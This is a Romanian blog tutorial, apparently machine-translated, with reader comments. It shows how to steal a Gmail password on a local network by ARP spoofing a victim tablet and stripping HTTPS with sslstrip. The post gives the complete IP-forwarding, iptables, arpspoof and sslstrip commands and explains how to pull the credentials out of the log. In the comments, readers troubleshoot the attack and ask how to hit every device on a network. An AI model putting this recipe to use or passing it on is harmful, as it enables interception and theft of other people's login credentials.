ArpSpoofing și SSlstrip în acțiune.

Bună ziua Bloggerilor.

Astăzi am un mic eșantion de cât de periculos poate fi conectarea în orice rețea fără securitatea celor care ne plac atât de mulți dintre noi.

Pentru astăzi, voi folosi ArpSpoofing cu Sslstrip pentru a obține o parolă Gmail. Pentru a face mediul mai controlat, am creat un cont numit „testarp@gmail.com".

Și întrucât nu îmi plac prea mult preambulurile, să trecem la treabă.

Nu sunt responsabil în niciun moment pentru ceea ce pot face cu următoarele informații. O fac exclusiv în scopuri educaționale

MEDIU INCONJURATOR

Pentru acest test, ceea ce avem este următorul:

1. Atacant: Este desktopul sau computerul meu care are Debian Wheezy. Din depozite puteți instala sslstrip y adulmecă a ajunge să aibă arpsspoofing

2. Victima: Victima este o tabletă Android care vrea să-și vadă e-mailul doar prin browser.

3. Mediul: Mijlocul este al meu Router Cisco DPC2425

ADRESE.

Adresa atacatorului: 172.26.0.2

Adresa routerului: 172.26.0.1

Adresa victimei: 172.26.0.8

ATACUL:

Pentru a înțelege mai mult cum funcționează atacul, puteți merge la vechiul meu POST

Primul lucru pe care îl vom face pentru acest atac este să activăm transmiterea, astfel încât computerul nostru să poată transmite informațiile victimei fără ca acestea să observe. (Altfel ar fi un atac de refuz de servicii)

Pentru aceasta vom folosi:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Fiecare comandă dintr-o fereastră directă a consolei.

Acum, dacă facem coada -f desdelinux vedem informația în direct și direct

instantaneu1

Deci, cum putem obține ceea ce vrem?

Să introducem mai întâi e-mailul nostru pe tabletă. În timp ce ne conectăm, vedem că mii și mii de lucruri apar pe consola noastră.

Acum că s-a terminat, să deschidem fișierul nostru „desdelinux” cu nano

nano desdelinux

cu Control + W căutăm ceva numit SECURE POST.

Și vom vedea așa ceva.

instantaneu2

Printre acea linie uriașă care nu poate fi văzută se numără e-mailul și parola victimei.

Așa că alergăm spre dreapta până când vom vedea în sfârșit lumina de la capătul tunelului.

instantaneu3

Cu altă ocazie vom vedea cum ne putem proteja puțin de aceste atacuri.

În ceea ce priveşte


Lasă comentariul tău

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

*

*

  1. Responsabil pentru date: Miguel Ángel Gatón
  2. Scopul datelor: Control SPAM, gestionarea comentariilor.
  3. Legitimare: consimțământul dvs.
  4. Comunicarea datelor: datele nu vor fi comunicate terților decât prin obligație legală.
  5. Stocarea datelor: bază de date găzduită de Occentus Networks (UE)
  6. Drepturi: în orice moment vă puteți limita, recupera și șterge informațiile.

  1.   @Jlcmux el a spus

    Profit de această ocazie pentru a spune că atunci când postarea a fost publicată, comenzile nu erau corecte.

    Comenzii iptables de la sfârșit lipsește 8080 care se află pe altă linie. Și apoi comenzile arpspoof erau toate pe aceeași linie. Fiecare comandă fiind pe o linie diferită.

    Sperăm că editorul o vede și o poate remedia.

    Salutări.

    1.    Manualul Sursei el a spus

      Am făcut corecțiile pe care le menționați, este bine?

      Dacă aveți de gând să inserați codul într-o intrare preferată, utilizați vizualizarea HTML și verificați dacă articolul este corect înainte de a-l trimite în așteptare. Mulțumesc.

  2.   Luis el a spus

    Este îngrozitor să știm că cei dintre noi care nu au cunoștințe suntem atât de vulnerabili. Informații foarte bune chiar și atunci când înțeleg puțin subiectul îmi dau seama de importanță. Mulțumesc!
    În ceea ce priveşte

  3.   giskard el a spus

    Dar asta funcționează numai dacă atacatorul și victima se află în aceeași rețea. În orice caz, mi se pare că dacă (fiind în aceeași rețea) vă conectați utilizând HTTPS, acest lucru nu se întâmplă deoarece datele sunt criptate ÎNAINTE să părăsiți aparatul. Dacă vă conectați prin HTTP (fără S) cred că, chiar și uitându-vă la cablul de rețea, vedeți tastele.

    1.    @Jlcmux el a spus

      Nu este adevarat. Hacking o parolă Gmail și dacă observați că Gmail folosește https. Asa de? Ideea este că, deși https este sigur, depinde de http. Deci nu este atât de sigur.

      Nu mărturisi atât de mult despre un https că S nu este pentru Superman ci este pentru „sigur”

    2.    Rten el a spus

      funcționează cu sau fără https, l-am încercat cu o distro Linux mai specializată și funcționează fără probleme

    3.    Manualul Sursei el a spus

      Îl puteți folosi cu precizie pentru a preda o lecție celor care vă fură Wi-Fi-ul. 😀

      Seamănă mai mult sau mai puțin cu ceea ce spuneau ei cu mult timp în urmă pe blogul lui Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant el a spus

        Ostia, grozav ce face! / Și apoi îmi spun paranoicul meu de fiecare dată când folosesc VPN-ul când merg să verifice contul bancar ...). Apropo, trebuie să vedeți cât de cinici sunt oamenii în comentarii ... dacă până la urmă fură ...

        1.    eliotime3000 el a spus

          Acum trebuie să luăm un tutorial despre cum să creați și să vă oferiți propriul serviciu VPN.

      2.    Daniel el a spus

        Povestea pe care o legați este foarte interesantă, pare chiar demnă de o carte nouă, iar acest lucru mă face să-mi amintesc când am folosit internetul vecinilor mei și, deși spun că cunosc subiectul, cred că nu aș putea vedea niciodată dimensiunile adevărate pericolul pe care l-aș fi putut rezista, din fericire pentru mine, au schimbat doar parola în WPA2 și de aici a început povestea mea cu ISP haha

    4.    Mauritius el a spus

      De aceea titlul spune Sslstrip în acțiune.

      Funcționează, atâta timp cât atacatorul este la mijloc

  4.   îndată el a spus

    Ce val lucrezi la prismă? -.-
    nr.
    Ce așteptați pentru a trimite cererea dvs. XD
    salutări
    post bun

  5.   auroszx el a spus

    Interesant, voi face un test educațional mai târziu ... Poate aș putea chiar să scot parola de pe WiFi și să mă distrez puțin puțin 😛
    Din întâmplare, puteți face ceva similar pentru a trimite pagini diferite către cele solicitate de țintă? De exemplu, vor să deschidă Facebook și eu le redirecționez către Google? 😛

    1.    @Jlcmux el a spus

      Da. Dar totul este foarte diferit.

      Poate îl voi posta mai târziu.

  6.   ultimul începător el a spus

    post foarte bun, aceste subiecte sunt foarte educative, acum trebuie să putem contracara acest atac, deoarece unii (ca mine) se conectează la rețelele publice (universitatea de exemplu) ar fi util să-l evităm.

    Salutări!

  7.   doar-un alt-dl-utilizator el a spus

    Nu a funcționat pentru mine 🙁

  8.   Wow el a spus

    Ceva îmi eșuează aici, în afară de faptul că conexiunile https sunt criptate printr-un certificat de server (odată ce ai certificatul pe computer, browserul tău se ocupă de criptare) cu iptables redirecționezi portul 80 (http), nu 443 , care este https

    1.    @Jlcmux el a spus

      M-am gândit și eu la asta. Ideea este că, deși https este „sigur”, din păcate depinde de http. Deci, sslstrip profită de acest lucru, îl face pe browser să creadă că folosește acreditări https, dar nu este.

      1.    Wow el a spus

        rahat sfânt! dar browserul ar trebui să vadă un avertisment de genul „acest certificat vine de la un site suspect sau ceva de genul ăsta” ... Cu siguranță va trebui să fac teste XD

        1.    @Jlcmux el a spus

          Nu, nu iese absolut nimic.

  9.   doar-un alt-dl-utilizator el a spus

    În cele din urmă a funcționat pentru mine
    Sunt conectat la o rețea WEP cu parolă și oricum mi-a arătat parola direct.

    O interogare. Puteți face aceeași procedură, dar pentru toate computerele conectate în rețea, în loc să aveți o singură victimă?

    1.    @Jlcmux el a spus

      Da, poti. Dar nu am făcut experimente. Încercați singur și spuneți-ne cum merge.

  10.   sinnick19 el a spus

    Singurul lucru pe care îl obțin este că mașina victimei se deconectează, dar sslstrip nu-mi arată nimic: /

    1.    @Jlcmux el a spus

      Ar trebui să dezactivați paravanul de protecție pentru o clipă. Sau cel puțin activați conexiunile primite.

  11.   Domn negru el a spus

    Probe și am putut vedea doar numele de utilizator și parola paginii de facebook, în gmail nu am găsit niciun rezultat în jurnal, de asemenea, am avut nevoie doar de o linie de arpspoof «arpspoof -i -t«. Pe de altă parte, aparatul victimei nu a putut deschide unele pagini. Voi continua să investighez, este foarte interesant. Un ajutor pentru cei care folosesc Manjaro, pachetele de instalat sunt: ​​dsniff (aici este arpspoff), twisted și python2-pyopenssl. Sslstrip poate fi descărcat de aici: http://www.thoughtcrime.org/software/sslstrip/
    Pentru a-l rula $ python2 sslstrip.py
    Salutări.

  12.   Domn negru el a spus

    Nu a ieșit, dar linia arpspoof este: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert el a spus

    uite fac exact ceea ce spui:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    problema este că victima care este un alt computer pe care îl am aici în camera mea, nu am nicio legătură cu punctul în care trebuie să repornesc routerul, ce să mă ajute.

    Un alt lucru pe care îl lucrez cu o mașină virtuală și când execut comanda iwconfig, nu apare wlan0 și nici când execut ifconfig, totuși, dacă am internet pe mașina mea virtuală, ce se întâmplă cu o interfață eth0.